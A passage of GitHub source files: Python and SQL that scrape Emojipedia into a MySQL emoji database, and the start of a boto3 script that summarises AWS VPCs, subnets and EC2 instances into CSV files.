'appearance_differs':appearance_differs,\n 'not_recommended':not_recommended}\n emoji_counts_dict[url] = {'id':emoji_index,\n 'platforms':[],\n 'num_renderings':0,\n 'num_changed_renderings':0}\n\n cursor.execute(insert_emoji_query,cur_dict)\n print(cursor.statement,file=db_file)\n cursor.executemany(insert_emoji_codepoint_query,emoji_codepoint_list)\n print(cursor.statement,file=db_file)\n print(file=db_file)\n if emoji_index % 50 == 0:\n print('completed 50 emoji ({0} total so far)'.format(emoji_index))\n emoji_index += 1\n\n cnx.commit()\n print('- Completed - ({0} emoji inserted)'.format(emoji_index-1))\n print()\n\n for category in EMOJI_CATEGORIES:\n print(\"for category \",category,\", found: \",category_count[category]['count'],\" out of \",category_count[category]['total'])\n print()\n\ncnx.close()"
},
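For reference, the codepoint_string column built by the script above concatenates U+-prefixed code points, and the script's own comment notes it can be split back apart with .split('U+'). A minimal, self-contained Python sketch of that round trip; the sample value is hypothetical:

codepoint_string = 'U+1F468U+200DU+1F4BB'  # hypothetical sample row value
codepoints = [cp for cp in codepoint_string.split('U+') if cp]  # drop the leading empty piece
character = ''.join(chr(int(cp, 16)) for cp in codepoints)
print(codepoints)  # ['1F468', '200D', '1F4BB']
print(character)   # the man-technologist ZWJ sequence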
{
"alpha_fraction": 0.8271604776382446,
"alphanum_fraction": 0.8271604776382446,
"avg_line_length": 15.199999809265137,
"blob_id": "cc86b9a3e603a25d60f2c37ca2b4bc59839f3bb9",
"content_id": "45e41e295e5707e3e8ea2a7744f22df230bc35b9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 81,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 5,
"path": "/database/setup_db.sql",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "source dropall.sql\nsource create_emoji.sql\nsource create_renderings.sql\n\nCOMMIT;\n"
},
{
"alpha_fraction": 0.5565624237060547,
"alphanum_fraction": 0.5599976181983948,
"avg_line_length": 47.517242431640625,
"blob_id": "05ca23501d82e0f1e9bb08e8381a7d1e4f849c12",
"content_id": "c3348124917351356b140d8eef07da46f18dee3f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16885,
"license_type": "permissive",
"max_line_length": 217,
"num_lines": 348,
"path": "/populatedb_renderings.py",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "import dateparser\nimport mysql.connector\nfrom local_config import db_config\nfrom emojipedia.emojipedia import Emojipedia,Emoji\nfrom emoji_data import PLATFORMS,PLATFORM_VERSIONS,PLATFORM_VERSION_URL_MISMATCH\n\n# Connect to the database\ncnx = mysql.connector.connect(user=db_config['user'],\n host=db_config['host'],\n password=db_config['password'],\n database=db_config['database'])\ncursor = cnx.cursor()\n# Enforce UTF-8 for the connection.\ncursor.execute('SET NAMES utf8mb4')\ncursor.execute(\"SET CHARACTER SET utf8mb4\")\ncursor.execute(\"SET character_set_connection=utf8mb4\")\n\n# Write all data definition queries to a file to be able to recreate the database without scraping\nwith open('database/data/insert_renderings.sql','w', encoding='utf-8') as db_file:\n\n print(\"Inserting PLATFORMS\")\n # -------- PLATFORMS --------\n insert_platform_query = (\"INSERT INTO platforms \"\n \"(platform_id,platform_name,platform_display_name) \"\n \"VALUES (%(id)s, %(name)s, %(display_name)s);\")\n platform_dict = {}\n platform_index = 1\n for (platform,platform_display_name) in PLATFORMS:\n cur_dict = {'id':platform_index,'name':platform,'display_name':platform_display_name}\n platform_dict[platform] = cur_dict\n cursor.execute(insert_platform_query,cur_dict)\n print(cursor.statement,file=db_file)\n platform_index += 1\n\n print(file=db_file)\n cnx.commit()\n print(\"- Completed -\")\n print()\n\n\n # -------- PLATFORM VERSIONS --------\n print(\"Inserting PLATFORM VERSIONS\")\n insert_platform_version_query = (\"INSERT INTO platform_versions \"\n \"(platform_version_id,platform_id,version_name,version_display_name,in_use,emojipedia_url_ext,post_version_id) \"\n \"VALUES (%(id)s, %(platform_id)s, %(name)s, %(display_name)s, %(in_use)s, %(url)s, %(post_version_id)s);\")\n platform_version_list = []\n last_looked_at_platform = None\n num_versions = len(PLATFORM_VERSIONS)\n platform_version_index = 1\n for i in range(0,num_versions):\n version,display_name,in_use = PLATFORM_VERSIONS[i]\n version_split = version.split(' ')\n\n platform = version_split[0].lower()\n version_name = ' '.join(version_split[1:])\n if version in PLATFORM_VERSION_URL_MISMATCH:\n version_name = ' '.join(PLATFORM_VERSION_URL_MISMATCH[version].split(' ')[1:])\n version_url_ext = ('-'.join(version_split[1:])).lower()\n\n # The list is ordered from most recent to least recent\n # so if the last looked at platform in the list is for the same platform,\n # then the last looked at platform is the \"post version\" of the version\n # we are currently looking at\n post_platform_index = None\n if platform == last_looked_at_platform:\n post_platform_index = platform_version_index - 1\n last_looked_at_platform = platform\n\n # likewise, the next version to look at in the list is the \"previous version\"\n # of the version we are currently looking at,\n # unless it is for a different platform, in which the current version is the oldest version\n # or unless the version we are currently looking at is the last version in the list,\n # also making it the oldest version\n prev_platform_index = platform_version_index + 1\n if (platform_version_index < num_versions-1 and \\\n not PLATFORM_VERSIONS[i+1][0].startswith(version_split[0])) \\\n or (platform_version_index == num_versions):\n prev_platform_index = None\n\n cur_dict = {'id':platform_version_index,\n 'platform':platform,\n 'platform_id':platform_dict[platform]['id'],\n 'name':version_name,\n 'display_name':display_name,\n 'in_use':in_use,\n 
'url':platform+'/'+version_url_ext,\n                    'prev_version_id':prev_platform_index,\n                    'post_version_id':post_platform_index}\n        platform_version_list.append(cur_dict)\n        cursor.execute(insert_platform_version_query,cur_dict)\n        print(cursor.statement,file=db_file)\n\n        platform_version_index += 1\n\n    print(file=db_file)\n    cnx.commit()\n    print(\"- Completed -\")\n    print()\n\n\n    # -------- POPULATE EMOJI DICTIONARY FROM DATABASE\n    print(\"Getting EMOJI from database\")\n    emoji_counts_dict = {}\n    emoji_dict_query = \"SELECT emoji_id,emojipedia_url_ext FROM emoji ORDER BY emoji_id;\"\n    cursor.execute(emoji_dict_query)\n    emoji_index = 0  # stays 0 if the table is empty, so the +1 below still yields a valid next id\n    for id,url in cursor:\n        emoji_index = id\n        emoji_counts_dict[url] = {'id':id,\n                                  'platforms':[],\n                                  'num_renderings':0,\n                                  'num_changed_renderings':0}\n    emoji_index += 1\n    print(\"Next inserted emoji at: {0}\".format(emoji_index))\n    print(\"- Completed -\")\n    print()\n\n\n    # -------- POPULATE CODE POINT DICTIONARY FROM DATABASE\n    print(\"Getting CODE POINTS from database\")\n    codepoint_dict = {}\n    codepoint_dict_query = \"SELECT codepoint_id,codepoint,isComponent,isModifier,isModifierBase FROM codepoints ORDER BY codepoint_id;\"\n    cursor.execute(codepoint_dict_query)\n    for id,codepoint,isComponent,isModifier,isModifierBase in cursor:\n        cur_dict = {'id':id,\n                    'codepoint':codepoint,\n                    'isComponent':isComponent,\n                    'isModifier':isModifier,\n                    'isModifierBase':isModifierBase}\n        codepoint_dict[codepoint] = cur_dict\n    emoji_codepoint_index_query = \"SELECT MAX(emoji_codepoint_id)+1 FROM emoji_codepoints;\"\n    cursor.execute(emoji_codepoint_index_query)\n    emoji_codepoint_index = cursor.fetchone()[0]\n    print(\"Next inserted emoji codepoint at: {0}\".format(emoji_codepoint_index))\n    print(\"- Completed -\")\n    print()\n\n\n    # -------- RENDERINGS & rest of PLATFORM VERSIONS --------\n    print('Inserting RENDERINGS & Updating rest of PLATFORM VERSIONS')\n    insert_rendering_query = (\"INSERT INTO renderings \"\n                              \"(rendering_id,emoji_id,platform_version_id,display_url,is_new,is_changed) \"\n                              \"VALUES (%(id)s, %(emoji_id)s, %(platform_version_id)s, %(display_url)s, %(isNew)s, %(isChanged)s);\")\n\n    update_platform_version_query = (\"UPDATE platform_versions SET \"\n                                     \"prev_version_id = %(prev_version_id)s, \"\n                                     \"release_date = %(release_date)s, \"\n                                     \"num_emoji = %(num_emoji)s, \"\n                                     \"num_changed_emoji = %(num_changed)s, \"\n                                     \"num_new_emoji = %(num_new)s, \"\n                                     \"num_removed_emoji = %(num_removed)s \"\n                                     \"WHERE platform_version_id = %(id)s;\")\n\n    insert_emoji_query = (\"INSERT INTO emoji \"\n                          \"(emoji_id,emoji_name,emoji_character,emojipedia_url_ext,codepoint_string,num_codepoints,hasComponent,hasModifier,hasModifierBase,appearance_differs_flag,unicode_not_recommended) \"\n                          \"VALUES (%(id)s, %(name)s, %(char)s, %(url)s, %(codepoint_string)s, %(num_codepoints)s, %(hasComponent)s, %(hasModifier)s, %(hasModifierBase)s, %(appearance_differs)s, %(not_recommended)s);\")\n\n    insert_emoji_codepoint_query = (\"INSERT INTO emoji_codepoints \"\n                                    \"(emoji_codepoint_id,emoji_id,codepoint_id,sequence_index) \"\n                                    \"VALUES (%(id)s, %(emoji_id)s, %(codepoint_id)s, %(sequence_index)s);\")\n\n    rendering_index = 1\n    emoji_to_skip = []\n    for platform_version in platform_version_list:\n        print('renderings and updating {0}'.format(platform_version['name']))\n        # First, build lists of changed emoji and new emoji\n        # get changed emoji\n        soup = Emojipedia._get_page(platform_version['url']+'/changed')\n        emoji_list = soup.find('ul', {'class': 'emoji-grid'})\n        changed_emoji_list = []\n        for emoji_entry in 
emoji_list.find_all('li'):\n # extract emoji url and then find associated emoji\n emoji_url = emoji_entry.findNext('a')['href'].rstrip('/')\n emoji_url_ext = emoji_url[(emoji_url.rindex('/')+1):]\n cur_dict = emoji_counts_dict.get(emoji_url_ext,None)\n if cur_dict:\n cur_dict['num_changed_renderings'] += 1\n changed_emoji_list.append(emoji_url_ext)\n platform_version['num_changed'] = len(changed_emoji_list)\n\n # get new emoji\n soup = Emojipedia._get_page(platform_version['url']+'/new')\n emoji_list = soup.find('ul', {'class': 'emoji-grid'})\n new_emoji_list = []\n for emoji_entry in emoji_list.find_all('li'):\n # extract emoji url and then find associated emoji\n emoji_url = emoji_entry.findNext('a')['href'].rstrip('/')\n emoji_url_ext = emoji_url[(emoji_url.rindex('/')+1):]\n new_emoji_list.append(emoji_url_ext)\n platform_version['num_new'] = len(new_emoji_list)\n\n # get removed emoji\n soup = Emojipedia._get_page(platform_version['url']+'/removed')\n emoji_list = soup.find('ul', {'class': 'emoji-grid'})\n platform_version['num_removed'] = len(emoji_list.find_all('li'))\n\n # Now, get the version page and get all the renderings\n soup = Emojipedia._get_page(platform_version['url'])\n emoji_list = soup.find('ul', {'class': 'emoji-grid'})\n num_emoji = 0\n for emoji_entry in emoji_list.find_all('li'):\n # extract emoji url and then find associated emoji\n emoji_url = emoji_entry.findNext('a')['href'].rstrip('/')\n emoji_url_ext = emoji_url[(emoji_url.rindex('/')+1):]\n\n # update emoji counts\n counts_dict = emoji_counts_dict.get(emoji_url_ext,None)\n if counts_dict is None:\n if emoji_url_ext in emoji_to_skip:\n print('skipping {0} again'.format(emoji_url_ext))\n print('-- skipping {0} again'.format(emoji_url_ext),file=db_file)\n num_emoji += 1\n continue\n\n # Emoji not found in dictionary, create emoji and emoji_codepoints if codepoints exist for emoji\n hasComponent = False\n hasModifier = False\n hasModifierBase = False\n emoji_codepoint_list = []\n sequence = 1\n is_emoji = True\n new_emoji = Emoji(url='/'+emoji_url_ext)\n for codepoint_U in new_emoji.codepoints:\n codepoint = codepoint_U[2:] # codepoints are pre-pended with U+\n cur_codepoint_dict = codepoint_dict.get(codepoint,None)\n if cur_codepoint_dict is None:\n is_emoji = False\n break\n hasComponent = hasComponent or cur_codepoint_dict['isComponent']\n hasModifier = hasModifier or cur_codepoint_dict['isModifier']\n hasModifierBase = hasModifierBase or cur_codepoint_dict['isModifierBase']\n\n emoji_codepoint_list.append({'id':emoji_codepoint_index,\n 'emoji_id':emoji_index,\n 'codepoint_id':cur_codepoint_dict['id'],\n 'sequence_index':sequence})\n emoji_codepoint_index += 1\n sequence += 1\n if not is_emoji:\n emoji_to_skip.append(emoji_url_ext)\n print(file=db_file)\n print('skipping {0}, codepoint(s) not in emoji data: {1}'.format(emoji_url_ext,new_emoji.codepoints))\n print('-- skipping {0}, codepoint(s) not in emoji data: {1}'.format(emoji_url_ext,new_emoji.codepoints),file=db_file)\n print(file=db_file)\n num_emoji += 1\n continue\n\n # Codepoint String = straight string of codepoints: U+###U+#### (to extract, .split('U+'))\n codepoint_string = ''.join(new_emoji.codepoints)\n\n # Description flags for appearance differing across platforms or not being recommended by the Unicode\n description = new_emoji.description\n appearance_differs = True if \"Appearance differs greatly cross-platform.\" in description else False\n not_recommended = True if \"has not been recommended by Unicode.\" in description else False\n if 
not not_recommended:\n not_recommended = True if \"has not been Recommended For General Interchange (RGI) by Unicode.\" in description else False\n\n cur_dict = {'id':emoji_index,\n 'name':new_emoji.title,\n 'char':new_emoji.character,\n 'url':emoji_url_ext,\n #'raw_character':emoji.character,\n 'codepoint_string':codepoint_string,\n 'num_codepoints':len(new_emoji.codepoints),\n 'hasComponent':hasComponent,\n 'hasModifier':hasModifier,\n 'hasModifierBase':hasModifierBase,\n 'appearance_differs':appearance_differs,\n 'not_recommended':not_recommended}\n counts_dict = {'id':emoji_index,\n 'platforms':[],\n 'num_renderings':0,\n 'num_changed_renderings':1}\n emoji_counts_dict[emoji_url_ext] = counts_dict\n\n print(file=db_file)\n cursor.execute(insert_emoji_query,cur_dict)\n print(cursor.statement,file=db_file)\n cursor.executemany(insert_emoji_codepoint_query,emoji_codepoint_list)\n print(cursor.statement,file=db_file)\n print(file=db_file)\n\n emoji_index += 1\n\n\n emoji_id = counts_dict['id']\n\n counts_dict['num_renderings'] += 1\n if platform_version['platform'] not in counts_dict['platforms']:\n counts_dict['platforms'].append(platform_version['platform'])\n\n # get image display url from the img src\n img_src = emoji_entry.findNext('img')['src']\n if img_src.endswith('lazy.svg'):\n img_src = emoji_entry.findNext('img')['data-src']\n\n isNew = emoji_url_ext in new_emoji_list\n isChanged = emoji_url_ext in changed_emoji_list\n\n # create the rendering, map by platform version id and emoji id\n rendering_dict = {'id':rendering_index,\n 'emoji_id':emoji_id,\n 'platform_version_id':platform_version['id'],\n 'display_url':img_src,\n 'isNew':isNew,\n 'isChanged':isChanged}\n cursor.execute(insert_rendering_query,rendering_dict)\n print(cursor.statement,file=db_file)\n\n rendering_index += 1\n num_emoji += 1\n # if num_emoji > 5:\n # break\n\n # Update platform version\n platform_version['num_emoji'] = num_emoji\n release_date_text = soup.find('div', {'class': 'content'}).findNext('ul').findNext('li').findNext('li').findNext('li').text[14:]\n release_date = dateparser.parse(release_date_text)\n platform_version['release_date'] = release_date.date()\n cursor.execute(update_platform_version_query,platform_version)\n print(cursor.statement,file=db_file)\n\n print(file=db_file)\n cnx.commit()\n print('- Completed -')\n print()\n\n\n # -------- rest of EMOJI --------\n print('Updating EMOJI counts')\n update_emoji_query = (\"UPDATE emoji SET \"\n \"num_platforms_support = %(num_platforms)s, \"\n \"num_changed_renderings = %(num_changed_renderings)s, \"\n \"num_renderings = %(num_renderings)s \"\n \"WHERE emoji_id = %(id)s;\")\n for counts in emoji_counts_dict.values():\n plat_list = counts.pop('platforms')\n counts['num_platforms'] = len(plat_list)\n cursor.execute(update_emoji_query,counts)\n print(cursor.statement,file=db_file)\n\n cnx.commit()\n print('- Completed -')\n\n print(file=db_file)\n print('COMMIT;',file=db_file)\n\n cnx.close()\n"
},
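The newest-to-oldest version linking that populatedb_renderings.py documents in its comments above (post_version_id points at the newer neighbour on the same platform, prev_version_id at the older one) is easier to see on a toy list. A minimal sketch with made-up version names and the same 1-based ids the script uses:

versions = ['ios 14.2', 'ios 13.3', 'android 11.0']  # ordered newest first, as in PLATFORM_VERSIONS
for i, v in enumerate(versions):
    vid = i + 1  # 1-based id, matching platform_version_index in the script
    platform = v.split(' ')[0]
    post_id = vid - 1 if i > 0 and versions[i - 1].startswith(platform) else None
    prev_id = vid + 1 if i + 1 < len(versions) and versions[i + 1].startswith(platform) else None
    print(v, '-> post:', post_id, 'prev:', prev_id)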
{
"alpha_fraction": 0.7267045378684998,
"alphanum_fraction": 0.738068163394928,
"avg_line_length": 31.61111068725586,
"blob_id": "d680926032498d549e01914e30d5634108e263d8",
"content_id": "aaf06e89b3a19e66f1cd723c0f38ab7d9e76a927",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1760,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 54,
"path": "/database/create_emoji.sql",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "DROP TABLE IF EXISTS emoji_codepoints;\nDROP TABLE IF EXISTS codepoints;\nDROP TABLE IF EXISTS emoji;\nDROP TABLE IF EXISTS emoji_versions;\n\nCREATE TABLE IF NOT EXISTS emoji_versions (\n emoji_version_id TINYINT NOT NULL AUTO_INCREMENT,\n emoji_version DECIMAL(2,1) UNIQUE NOT NULL,\n emoji_version_name VARCHAR(20),\n emojipedia_url_ext VARCHAR(20),\n PRIMARY KEY (emoji_version_id)\n);\n\nCREATE TABLE IF NOT EXISTS emoji (\n emoji_id SMALLINT NOT NULL AUTO_INCREMENT,\n emoji_name VARCHAR(150),\n emoji_character VARCHAR(30),\n emojipedia_url_ext VARCHAR(150) UNIQUE,\n emojipedia_category VARCHAR(50),\n codepoint_string VARCHAR(150) UNIQUE,\n num_codepoints TINYINT,\n num_platforms_support TINYINT,\n num_renderings TINYINT,\n num_changed_renderings TINYINT,\n hasComponent BOOLEAN DEFAULT NULL,\n hasModifier BOOLEAN DEFAULT NULL,\n hasModifierBase BOOLEAN DEFAULT NULL,\n appearance_differs_flag BOOLEAN,\n unicode_not_recommended BOOLEAN,\n emoji_version_id TINYINT,\n PRIMARY KEY (emoji_id),\n FOREIGN KEY (emoji_version_id) REFERENCES emoji_versions(emoji_version_id)\n);\n\nCREATE TABLE IF NOT EXISTS codepoints (\n codepoint_id SMALLINT NOT NULL AUTO_INCREMENT,\n codepoint VARCHAR(7) NOT NULL UNIQUE,\n isComponent BOOLEAN DEFAULT NULL,\n isModifier BOOLEAN DEFAULT NULL,\n isModifierBase BOOLEAN DEFAULT NULL,\n PRIMARY KEY (codepoint_id)\n);\n\nCREATE TABLE IF NOT EXISTS emoji_codepoints (\n emoji_codepoint_id MEDIUMINT NOT NULL AUTO_INCREMENT,\n emoji_id SMALLINT,\n codepoint_id SMALLINT,\n sequence_index TINYINT,\n PRIMARY KEY (emoji_codepoint_id),\n FOREIGN KEY (emoji_id) REFERENCES emoji(emoji_id),\n FOREIGN KEY (codepoint_id) REFERENCES codepoints(codepoint_id)\n);\n\nCOMMIT;"
},
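Once create_emoji.sql above has been applied and the populate scripts have run, the emoji, emoji_codepoints and codepoints tables join on their foreign keys. A minimal query sketch reusing the repository's mysql.connector setup; the emoji name is a hypothetical example:

import mysql.connector
from local_config import db_config

cnx = mysql.connector.connect(**db_config)
cursor = cnx.cursor()
cursor.execute(
    "SELECT e.emoji_name, ec.sequence_index, c.codepoint "
    "FROM emoji e "
    "JOIN emoji_codepoints ec ON ec.emoji_id = e.emoji_id "
    "JOIN codepoints c ON c.codepoint_id = ec.codepoint_id "
    "WHERE e.emoji_name = %s ORDER BY ec.sequence_index;", ('Winking Face',))
for name, seq, codepoint in cursor:
    print(name, seq, codepoint)  # one row per code point, in sequence order
cnx.close()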
{
"alpha_fraction": 0.8087649345397949,
"alphanum_fraction": 0.8087649345397949,
"avg_line_length": 24.200000762939453,
"blob_id": "0515a20cee3feec51143b4898be7d66dd46839db",
"content_id": "917a882b0b214b97c3210097b282d37bb0ab0edc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 251,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 10,
"path": "/database/dropall.sql",
"repo_name": "rodrigossgithub/populate-emoji-database",
"src_encoding": "UTF-8",
"text": "DROP TABLE IF EXISTS renderings;\nDROP TABLE IF EXISTS platform_versions;\nDROP TABLE IF EXISTS platforms;\n\nDROP TABLE IF EXISTS emoji_codepoints;\nDROP TABLE IF EXISTS codepoints;\nDROP TABLE IF EXISTS emoji;\nDROP TABLE IF EXISTS emoji_versions;\n\nCOMMIT;"
}
] | 8 |
aurbac/aws-summary
|
https://github.com/aurbac/aws-summary
|
cc0e92cea52a7edb6220751e2992a92e0d35b3a5
|
25f91eb20f83e78c51719aa6ed50716d6c208f63
|
52644a7800e378cc72db721521d76908cbef4f76
|
refs/heads/master
| 2021-05-22T00:18:42.243004 | 2020-04-20T19:46:14 | 2020-04-20T19:46:14 | 252,880,540 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7473347783088684,
"alphanum_fraction": 0.7547974586486816,
"avg_line_length": 23.710525512695312,
"blob_id": "fdacea6bcaf0877dc500a3e90a568982d00c0386",
"content_id": "03c3431e38c03ae0462d44d6bcf2f08562f0e29e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 938,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 38,
"path": "/README.md",
"repo_name": "aurbac/aws-summary",
"src_encoding": "UTF-8",
"text": "# AWS Summary\n\nAWS Summary for the following services:\n\n- VPC\n- Subnets\n- EC2 Instances + Compute Optimizer\n- EBS\n- Snapshots\n- Reserved EC2 Instances\n- RDS Instances\n- Reserved RDS Instances\n\n[Activate **Compute Optimizer** in order to have instace recommendations, data will be available few hours later](https://docs.aws.amazon.com/compute-optimizer/latest/ug/getting-started.html#account-opt-in).\n\nClone this github project and inside the folder execute the following commands.\n\n1\\. Install requirements.\n\n``` bash\npip install -t lib -r requirements.txt\n```\n\n2\\. Setting the environment variables with IAM credentials for your user (**with read only permissions**).\n\n``` bash\nexport AWS_ACCESS_KEY_ID=YOUR_AWS_ACCESS_KEY_ID\nexport AWS_SECRET_ACCESS_KEY=YOUR_AWS_SECRET_ACCESS_KEY\nexport AWS_DEFAULT_REGION=us-east-1\n```\n\n3\\. Execute the script.\n\n``` bash\npython aws_summary.py\n```\n\n4\\. You can find the results in **services** folder."
},
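A quick way to confirm that the credentials exported in step 2 of the README above are picked up (boto3 reads them from the environment automatically); this two-line check is not part of the repository:

import boto3
print(boto3.client('sts').get_caller_identity()['Account'])  # prints your 12-digit account id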
{
"alpha_fraction": 0.6806081533432007,
"alphanum_fraction": 0.6892191171646118,
"avg_line_length": 46.046295166015625,
"blob_id": "f5fcc6bceb76c34ba40485e76533017ae7cd278a",
"content_id": "5ba8849ed2ba73611d06288c377e03a1bae0fcb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20323,
"license_type": "no_license",
"max_line_length": 373,
"num_lines": 432,
"path": "/aws_summary.py",
"repo_name": "aurbac/aws-summary",
"src_encoding": "UTF-8",
"text": "'''\n Author: Uriel Ramirez\n Email: [email protected]\n'''\nimport boto3\nfrom datetime import datetime, timedelta\nimport time\nimport botocore\nimport ssl\nimport os\nimport json\nimport pandas as pd\nimport os.path\nfrom os import path\n\nfrom botocore.exceptions import ClientError\nfrom boto3 import Session\n\nif 'AWS_ACCESS_KEY_ID' in os.environ:\n\tAWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\nif 'AWS_SECRET_ACCESS_KEY' in os.environ:\n\tAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\nif 'AWS_DEFAULT_REGION' in os.environ:\n\tAWS_DEFAULT_REGION = os.environ['AWS_DEFAULT_REGION']\n\ndef describeServiceItems( client , describe_function, key_items, filters=\"\", next_step=\"\"):\n\ttry:\n\t\tif (next_step!=\"\"):\n\t\t\t#print(\"Filters - \" + filters)\n\t\t\tfilters_to_add = \"\"\n\t\t\tif filters != \"\":\n\t\t\t\tfilters_to_add = \", \"+filters\n\t\t\tif describe_function==\"list_resource_record_sets\":\n\t\t\t\tstrfunction = \"client.\"+describe_function+\"(StartRecordName='\"+next_step+\"'\"+filters_to_add+\")\"\n\t\t\telse:\n\t\t\t\tstrfunction = \"client.\"+describe_function+\"(NextToken='\"+next_step+\"'\"+filters_to_add+\")\"\n\t\t\t#print(\"1 - \" + strfunction)\n\t\t\tresponse = eval(strfunction)\n\t\telse:\n\t\t\tstrfunction = \"client.\"+describe_function+\"(\"+filters+\")\"\n\t\t\t#print(\"2 - \" + strfunction)\n\t\t\tresponse = eval(strfunction)\n\t\tlistItems = []\n\t\tif not key_items in response or len(response[key_items])<=0:\n\t\t\treturn False\n\t\telse:\n\t\t\tlistItems = response[key_items]\n\t\t##print(\"\");\n\t\tif 'NextToken' in response:\n\t\t\t#print(\"go 1\")\n\t\t\tlistItems += describeServiceItems(client, describe_function, key_items, filters, response['NextToken'])\n\t\tif 'NextRecordName' in response:\n\t\t\t#print(\"go 2\")\n\t\t\tlistItems += describeServiceItems(client, describe_function, key_items, filters, response['NextRecordName'])\n\t\treturn listItems\n\texcept botocore.exceptions.EndpointConnectionError as e:\n\t\tprint(e)\n\t\treturn False\n\texcept ClientError as e:\n\t\tprint(e)\n\t\treturn False\n\t\t\ndef isTrueOrFalse( bool_vale ):\n\tif bool_vale:\n\t\treturn \"True\"\n\telse:\n\t\treturn \"False\"\n\n\ndef getExistsValueKey( item, keyname ):\n\tif keyname in item:\n\t\treturn item[keyname]\n\telse:\n\t\treturn \"\"\n\n\ndef existsKey( item, keyname ):\n\tif keyname in item:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef getValueTag( items, keyname ):\n\tfor item in items:\n\t\tif item['Key'] == keyname:\n\t\t\treturn item['Value']\n\treturn \"\"\n\t\t\ndef getValueFromArray(items):\n\tstrVO = \"\"\n\tfor index, item in enumerate(items):\n\t\tif index < len(items) and index > 0:\n\t\t\tstrVO += \", \"\n\t\tstrVO += item\n\treturn strVO\n\t\ndef getRoleFromProfile (item):\n\tstrRole = \"\"\n\tif item!=\"\":\n\t\tvalues = item['Arn'].split(\":\")\n\t\treturn values[5].split(\"/\")[1]\n\telse:\n\t\treturn strRole\n\ndef isValueInArray(value, items, key):\n\tfor item in items:\n\t\tif key in item:\n\t\t\tif item[key]==value:\n\t\t\t\treturn True\n\treturn False\n\t\ndef getItemFromArray(key, value, items):\n\tfor item in items:\n\t\tif key in item and item[key]==value:\n\t\t\treturn item\n\treturn False\n\t\t\nsession = Session(aws_access_key_id=AWS_ACCESS_KEY_ID, aws_secret_access_key=AWS_SECRET_ACCESS_KEY, region_name=AWS_DEFAULT_REGION)\n\n\npath_folder = \"./services\"\nif not path.exists(path_folder):\n\tos.mkdir(path_folder)\n\naccount_id = 
boto3.client('sts').get_caller_identity().get('Account')\n\n######################################################################\n###################################################################### AMAZON VPC\n######################################################################\n\nclient = session.client('ec2')\n\nresponseVpcs = describeServiceItems(client, \"describe_vpcs\", \"Vpcs\")\nif responseVpcs:\n\tdataVpcs = []\n\tfor item in responseVpcs:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\titem_service['Name'] = getValueTag( getExistsValueKey(item, 'Tags'), \"Name\")\n\t\titem_service['VpcId'] = item['VpcId']\n\t\titem_service['State'] = item['State']\n\t\titem_service['CidrBlock'] = item['CidrBlock']\n\t\titem_service['DhcpOptionsId'] = item['DhcpOptionsId']\n\t\titem_service['InstanceTenancy'] = item['InstanceTenancy']\n\t\titem_service['IsDefault'] = isTrueOrFalse(item['IsDefault'])\n\t\tdataVpcs.append(item_service)\n\tdf = pd.DataFrame(dataVpcs)\n\tdf.to_csv(path_folder+'/vpc_vpcs.csv', index=False)\n\nresponseSubnets = describeServiceItems(client, \"describe_subnets\", \"Subnets\")\nif responseSubnets:\n\tdataSubnets = []\n\tfor item in responseSubnets:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\titem_service['Name'] = getValueTag( getExistsValueKey(item, 'Tags'), \"Name\")\n\t\titem_service['SubnetId'] = item['SubnetId']\n\t\titem_service['State'] = item['State']\n\t\titem_service['VpcId'] = item['VpcId']\n\t\titem_service['CidrBlock'] = item['CidrBlock']\n\t\titem_service['AvailableIpAddressCount'] = str(item['AvailableIpAddressCount'])\n\t\titem_service['AvailabilityZone'] = item['AvailabilityZone']\n\t\titem_service['DefaultForAz'] = isTrueOrFalse(item['DefaultForAz'])\n\t\tdataSubnets.append(item_service)\n\tdf = pd.DataFrame(dataSubnets)\n\tdf.to_csv(path_folder+'/vpc_subnets.csv', index=False)\n\n######################################################################\n###################################################################### AMAZON EC2\n######################################################################\n\nclient_cw = session.client('cloudwatch')\nclient_co = session.client('compute-optimizer')\n\nresponseInstanceRecommendations = describeServiceItems(client_co, \"get_ec2_instance_recommendations\", \"instanceRecommendations\", \" filters=[ { 'name': 'Finding', 'values': ['Underprovisioned','Overprovisioned','Optimized']}] \")\n\nresponseInstances = describeServiceItems(client, \"describe_instances\", \"Reservations\")\nif responseInstances:\n\tdataInstances = []\n\tfor reservation in responseInstances:\n\t\tfor instance in reservation['Instances']:\n\t\t\titem_service = {}\n\t\t\titem_service['AccountId'] = account_id\n\t\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\t\titem_service['InstanceId'] = instance['InstanceId']\n\t\t\titem_service['State'] = instance['State']['Name']\n\t\t\titem_service['Name'] = getValueTag( getExistsValueKey(instance, 'Tags'), \"Name\")\n\t\t\titem_service['InstanceType'] = instance['InstanceType']\n\t\t\titem_service['LaunchTime'] = instance['LaunchTime']\n\t\t\titem_service['VirtualizationType'] = instance['VirtualizationType']\n\t\t\titem_service['EbsOptimized'] = isTrueOrFalse(instance['EbsOptimized'])\n\t\t\titem_service['EnaSupport'] = getExistsValueKey(instance, 'EnaSupport')\n\t\t\titem_service['KeyName'] = getExistsValueKey(instance, 